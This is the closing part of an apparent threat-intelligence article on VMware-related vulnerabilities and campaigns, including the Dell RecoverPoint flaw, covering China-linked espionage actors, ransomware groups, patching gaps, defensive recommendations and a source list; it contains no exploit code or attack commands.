CVE-2026-22769  |  CVSS: 10.0  |  Dell RecoverPoint for Virtual Machines — Hardcoded credential in Apache Tomcat Manager; unauthenticated RCE and root persistence; exploited by UNC6201 since mid-2024

Patterns, Themes, and Threat Actor Profiles

China-Nexus Threat Actors: Persistent Presence in VMware Ecosystems

Across the landscape documented above, Chinese state-linked threat actors appear repeatedly. UNC3886 was documented by Mandiant throughout 2024 as deploying extensive zero-day exploits across VMware and Fortinet products. UNC5174 exploited the VMware Aria zero-day beginning in October 2024. UNC6201 spent roughly 18 months inside organizations via the Dell RecoverPoint flaw before being discovered. The March 2025 VMware ESXi zero-day toolkit contained development artifacts with simplified Chinese strings, leading Huntress researchers to assess it was likely developed by a well-resourced developer operating in a Chinese-speaking region. This pattern is consistent with strategic Chinese cyber-espionage priorities: long-duration access, minimal operational noise, and targeting of infrastructure that provides maximum visibility into victim environments.

Ransomware Groups: Opportunistic Mass Exploitation

In contrast to the patient, targeted approach of state-sponsored actors, ransomware groups have been quick to weaponize VMware vulnerabilities at mass scale. The ESXiArgs campaign of February 2023 demonstrated that even years-old, patched vulnerabilities represent enormous opportunity when a significant percentage of organizations fail to apply updates. Groups including Conti, Royal, Cl0p, Storm-0506, and Manatee Tempest have all been documented using VMware vulnerabilities in ransomware deployment chains. The ESXi hypervisor is particularly attractive to ransomware operators because encrypting or disrupting a single host can render an entire organization's server infrastructure non-functional simultaneously.

The Patching Gap: Why Old Vulnerabilities Keep Working

One of the most consistent findings across all documented VMware attack campaigns is the persistence of patching failures. CVE-2021-21974, patched in February 2021, was still being successfully exploited in February 2023 — two years later. CVE-2022-22954, trivially exploitable within days of disclosure, was being actively abused weeks after the patch was released. This gap between disclosure and remediation reflects both the operational complexity of patching production virtualization infrastructure and organizational challenges in prioritizing security work.

Supply Chain and Adjacent Infrastructure: The Evolving Attack Surface

The Dell RecoverPoint campaign represents an evolution in VMware-targeting strategy. Rather than attacking the hypervisor directly, UNC6201 compromised the backup and disaster recovery infrastructure that organizations depend on to recover from attacks. This approach is particularly insidious because backup systems often operate with elevated trust relationships and broad network access to the systems they protect — and organizations may be less vigilant about the security posture of their recovery appliances than their primary infrastructure.

Defensive Recommendations

The cumulative record of VMware vulnerabilities and attack campaigns points to several concrete defensive priorities for organizations running VMware infrastructure.

Patch management must be treated as a continuous, prioritized process rather than a periodic maintenance task. The window between VMware vulnerability disclosure and active exploitation has consistently been days to weeks — not months. Federal agencies are given hard deadlines by CISA's KEV catalog; private sector organizations should adopt similar urgency.

Network segmentation of VMware management infrastructure is essential. vCenter Server, ESXi management interfaces, and backup appliances like Dell RecoverPoint should never be reachable from general user networks or directly from the internet. The recommendations from both VMware (now Broadcom) and CISA consistently emphasize restricting access to management interfaces.

Monitoring for anomalous behavior within virtual infrastructure should extend beyond guest VMs to the hypervisor layer itself. The creation of unexpected virtual network interfaces, unusual Tomcat Manager web requests, unexpected processes running on management appliances, and boot-time script modifications are all indicators of compromise documented in these campaigns. Deploying EDR and monitoring tooling that has visibility into hypervisor-layer activity is increasingly necessary.

Organizations should actively hunt for indicators of compromise associated with the malware families documented in these campaigns. BRICKSTORM, GRIMBOLT, and SLAYSTYLE have published YARA rules and indicators of compromise from Google Mandiant. For the March 2025 ESXi zero-day cluster, Broadcom released specific detection guidance. CISA's KEV catalog serves as the authoritative minimum list of vulnerabilities requiring urgent attention.

Finally, organizations should recognize that VMware backup and recovery appliances are high-value targets that require the same security attention as primary infrastructure. Default credentials — a root cause of the Dell RecoverPoint zero-day — must be changed immediately upon deployment and audited regularly. Backup appliances should be subject to the same patch management processes as production systems, and their network communications should be monitored for unexpected outbound connections.

Conclusion

VMware's position at the center of enterprise virtualization has made it a perennial target for some of the world's most capable threat actors. The documented history from 2021 through early 2026 shows a consistent pattern: critical vulnerabilities are disclosed, exploited quickly, and in some cases remain weaponized for years due to patching failures. Nation-state actors — particularly those linked to China — have demonstrated sustained interest in VMware environments as platforms for long-duration espionage, while ransomware groups have treated VMware ESXi as a force multiplier for maximum operational disruption.

The Dell RecoverPoint campaign disclosed in February 2026 adds a new dimension to this threat landscape: the targeting of VMware-adjacent backup and recovery infrastructure as a pathway to persistent access within virtualized environments. As organizations increasingly rely on hypervisors to consolidate critical workloads, the security of the entire virtualization stack — including management tools, backup systems, and monitoring platforms — must be treated as a first-tier security concern.

The sources for this article include public advisories from CISA, Broadcom/VMware, Dell, Google Mandiant, the Google Threat Intelligence Group, Huntress, NVISO Labs, CERT-EU, Palo Alto Networks Unit 42, Microsoft Threat Intelligence Center, BleepingComputer, Help Net Security, The Hacker News, SecurityWeek, Cybersecurity Dive, Infosecurity Magazine, SOC Prime, Truesec, and the runZero research team.

Key Sources and References

  • CISA Known Exploited Vulnerabilities Catalog: cisa.gov/known-exploited-vulnerabilities-catalog
  • Google Cloud/Mandiant: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day (February 18, 2026) — cloud.google.com
  • Broadcom/VMware Security Advisories: support.broadcom.com
  • CISA Advisory AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
  • Palo Alto Networks Unit 42: Threat Brief — VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954)
  • BleepingComputer: Massive ESXiArgs Ransomware Attack Targets VMware ESXi Servers Worldwide (February 2023)
  • Huntress: ESXi Exploitation in the Wild (January 2026) — huntress.com
  • NVISO Labs: You Name It, VMware Elevates It — CVE-2025-41244 (September 29, 2025) — blog.nviso.eu
  • Cybersecurity Dive: Hackers exploit zero-day flaw in Dell RecoverPoint for Virtual Machines (February 2026)
  • Help Net Security: China-linked hackers exploited Dell zero-day since 2024 (CVE-2026-22769) — February 2026
  • SecurityWeek: Dell RecoverPoint Zero-Day Exploited by Chinese Cyberespionage Group — February 2026
  • runZero Research: VMware ESXi Vulnerabilities — How to Find Impacted Assets
  • CERT-EU Security Advisory 2024-024: Vulnerabilities in VMware Products — March 2024
  • SOC Prime Blog: CVE-2025-41244 Zero-Day Vulnerability / CVE-2026-22769 Vulnerability